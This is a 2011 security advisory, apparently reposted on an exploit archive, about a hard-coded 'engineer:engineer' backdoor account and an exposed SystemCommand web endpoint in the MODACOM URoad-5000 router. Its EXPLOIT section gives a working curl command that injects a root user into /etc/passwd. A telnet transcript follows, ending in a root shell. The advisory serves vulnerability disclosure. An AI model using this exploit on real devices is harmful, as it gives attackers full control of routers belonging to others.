MODACOM URoad-5000 1450 Command Execution

MODACOM URoad-5000 1450 Command Execution: Posted Jun 2, 2011; Authored by Alex Stanev | Site sec.stanev.org; MODACOM URoad-5000 version 1450 has a hard-coded backdoor account that allows for remote command execution.; tags | exploit, remote; SHA-256 | 7aa00fead7d830e9d8dce87c99dd46947c5558d1709822584f40bcd93224942c; Download | Favorite | View

MODACOM URoad-5000 1450 Command Execution

      ================================================
     == Alex Stanev Security Advisory #4 @31.05.2011 ==
     ==             http://sec.stanev.org            ==
      ================================================
 
PRODUCT
     URoad-5000
 
VENDOR
     MODACOM [http://www.modacom.co.kr]
 
VERSIONS AFFECTED
     v1450
 
CLASS
     Remote command execution/Backdoor
 
PRODUCT DESCRIPTION
     URoad-5000 is integrated battery powered wireless router. It comes with only one external USB
     interface and no other hardware comm interfaces (such as ethernet). Based on RaLink SoC 3050.
     The USB port is used for connection with MW-U3050, which is USB WiMAX dongle.
     Linux inside.
     Often marketed as WiMAX 2 WiFi "converter".
 
THE PROBLEM
     The box uses modified version of RaLink SDK. The standard web interface is accessed via HTTP.
     1) Web administration interface can be accessed with standard user/password pair admin:admin
     This can be later changed, but there is another possible access pair - engineer:engineer
     and it can't be changed via the web interface.
     2) Some of the SDK standard scripts are left and their screens in the web interface are just
     HTML commented. This reveals the /goform/SystemCommand method.
 
EXPLOIT
     1) Remote add r00t user with password boza
          $curl --basic -u "engineer:engineer" \
            -d "command=echo -e \"r00t:CRYM.sLY1U1AI:0:0:Adminstrator:/:/bin/sh\" >> /etc/passwd;&SystemCommandSubmit=Apply" \
            192.168.100.254/goform/SystemCommand
          $telnet 192.168.100.254
          Trying 192.168.100.254...
          Connected to 192.168.100.254.
          modacom login: r00t
          Password: boza
          BusyBox v1.12.1 (2010-03-05 21:33:57 KST) built-in shell (ash)
          Enter 'help' for a list of built-in commands.
          #
 
ADDITIONAL INFO
     The flaw was presented on OpenFest 2010.
     Presentation: http://openfest.org/files/slides-2010/OpenFest2010_Reverse_engineering_Alex_Stanev.pdf [in bulgarian]
 
PATCH/WORKAROUND
     No workaround possible. Next version?
 
VENDOR STATUS
     NOT informed. Backdoor.
 
     =========================
    ==           EOF         ==
    == http://sec.stanev.org ==
     =========================

Top Authors In Last 30 Days

Red Hat 221 files
Ubuntu 59 files
Debian 30 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
tmrswrr 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,298)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,550)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,453)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

MODACOM URoad-5000 1450 Command Execution

MODACOM URoad-5000 1450 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

MODACOM URoad-5000 1450 Command Execution

Share This

MODACOM URoad-5000 1450 Command Execution

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems